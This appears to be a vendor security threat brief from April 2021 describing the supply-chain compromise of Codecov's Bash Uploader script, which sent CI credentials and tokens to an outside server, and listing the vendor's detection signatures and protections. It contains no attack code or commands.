Threat Brief: Codecov Bash Uploader
< 1 min read
Advanced Threat Preventionπ Advanced WildFire icon
Advanced WildFireπ Cortex XDR icon
Cortex XDRπ Cortex XSOAR icon
Cortex XSOARπ Next-Generation Firewall icon
Next-Generation Firewall
-
π Profile Icon
By: -
π Published Icon
Published:April 23, 2021 - π Tags IconCategories:
- π Tags Icon
On April 16, Codecov, an online platform and software company that provides code testing reports and statistics, disclosed that an adversary modified their Bash Uploader script. The Bash Uploader script allows its customers to send code coverage reports to the Codecov platform for analysis.
Codecovβs investigation found that beginning January 31, a threat actor made periodic, unauthorized alterations to the Bash Uploader script. The script was modified to export information out of their usersβ continuous integration (CI) environments to a third-party server outside of Codecovβs infrastructure. This information could include, but is not limited to, credentials, tokens, services, datastores and application code.
This incident is not limited to clients who only used the Bash Uploader script. This script can also be found in other tools such as:
As of the time of this writing, based on signatures and indicators that have been observed, Palo Alto Networks customers are protected across our product ecosystem, with specific protections deployed in the following products and subscriptions:
- Next-Generation Firewall
- Threat Prevention: Anti-Spyware Signatures 86353 (Malicious Modified Shell Script Detection) and 86355 (Data Exfiltration Traffic Detection)
- WildFire: WildFire blocks the malicious Bash Uploader Script
- Cortex XDR
- Customers are protected via XDR analytical detection capabilities
- Cortex XSOAR:
- Codecov Breach - Bash Uploader (Rapid Breach Response Pack)
Organizations using Codecovβs Bash Uploader script, or one of the other impacted tools should carefully evaluate their exposure to this threat. We recommend customers take advantage of the protections listed above and implement the remediation actions recommended by Codecov to limit their impact.
